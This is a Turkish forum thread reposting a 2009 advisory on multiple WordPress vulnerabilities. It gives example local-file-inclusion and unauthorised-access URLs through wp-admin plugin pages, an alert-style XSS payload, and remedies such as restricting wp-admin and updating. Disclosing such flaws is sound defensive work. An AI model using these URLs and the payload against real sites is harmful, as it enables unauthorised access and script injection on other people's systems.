You are not logged in.

WordPress Çoklu Güvenlik Açıkları

VATAN İÇİN YAŞAYIP, VATAN İÇİN ÖLDÜLER ONLAR TOPRAĞA DEĞİL, KALPLERİMİZE GÖMÜLDÜLER..

KARAPENCE

BOARD CHEF

  • male
  • "KARAPENCE" started this thread
    • Deutschland Türkei

Posts: 17,690

Date of registration: Sep 21st 2000

Location: Tokat/TÜRKIYE Hamburg/ALMANYA

Occupation: WEBMASTER

Hobbies: Güzel olan her sey

Level: 63 [?]

Experience: 75,469,784

Next Level: 86,547,382

Danksagungen: 14526

  • Send private message

Steinbock

1

Thursday, October 15th 2009, 10:24pm

WordPress Çoklu Güvenlik Açıkları



Popüler içerik yönetim sistemi WordPress'te çoklu güvenlik açıkları tespit edildi. Buna göre çeşitli URL istekleriyle izinsiz olarak çeşitli eklenti ve ayar sayfalarına ulaşmak mümkün. Bunun yanı sıra çeşitli JavaScript kodlar ile bu eklentilere zararlı kodlar da eklenebiliyor.

Çeşitli eklentilerde bulunan zafiyetlerin tetiklediği güvenlik açıkları doğrudan admin.php ile de ilgili olabiliyor. Uzaktan (remote) olarak tarif edilen güvenlik açıkları şuan için WordPress 2.8 ve öncesini, WordPress MU 2.7.1 ve öncesini etkilemekte.

Örnek saldırılar:
Local File Inclusion için, admin.php?page=

Source code

 
1
2

http://[websayfası]/wp-admin/admin.php?page=/collapsing-archives/options.txt
http://[websayfası]/wp-admin/options-general.php?page=collapsing-archives/options.txt


Eklenti ayar modülündeki XSS için,

Source code

 
1
2
3

http://[websayfası]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php
http://[websayfası]/wp-admin/admin.php?page=related-ways-to-take-action/options.php
\"/><script>alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83))</script><ahref="


WP Security Scanner pano görüntüleme,

Source code

 
1

http://[websayfası]/wp-admin/admin.php?page=wp-security-scan/securityscan.php


Çözüm:
Wp-admin dizinine olan erişim kolaylığı yüzünden meydana gelen bu güvenlik açıkları yine bu klasörün kısıtlanmasıyla giderilebilir. Bunu apache'nin .htaccess dosyası yardımıyla yapabilirsiniz. Ya da WordPress'inizi son sürüme güncellemelisiniz.

Referans:
http://corelabs.coresecurity.com/index.p…leges_Unchecked

 

Dikkat! NextDown.net den DOSYA indiremiyenler mutlaka burayı okusunlar TIKLAYINIZ

kadir36

Moderator

  • male

Posts: 1,015

Date of registration: Oct 22nd 2009

Location: Türkiye/Konya

Occupation: Pc Uzmanı

Hobbies: www.onur-board.eu

Level: 36 [?]

Experience: 961,995

Next Level: 1,000,000

Danksagungen: 2137

  • Send private message

Fische

2

Monday, February 15th 2010, 11:59am

RE:WordPress Çoklu Güvenlik Açıkları

Paylaşım İçin Teşekkürler

Counter:

Hits today: 236 | Hits yesterday: 2,677 | Hits record: 9,256 | Hits total: 761,797 Average hits: 2,216.47 | Clicks today: 7,714 | Clicks yesterday: 24,461 | Clicks total: 6,438,842 | Clicks record: 60,478 | Clicks avarage: 18,734.03 Counter age (days): 343.7 | Counts since: Jun 18th 2011, 2:13pm

Zirve1 en iyi Türk Siteleri
Zirve1 en iyi Türk Siteleri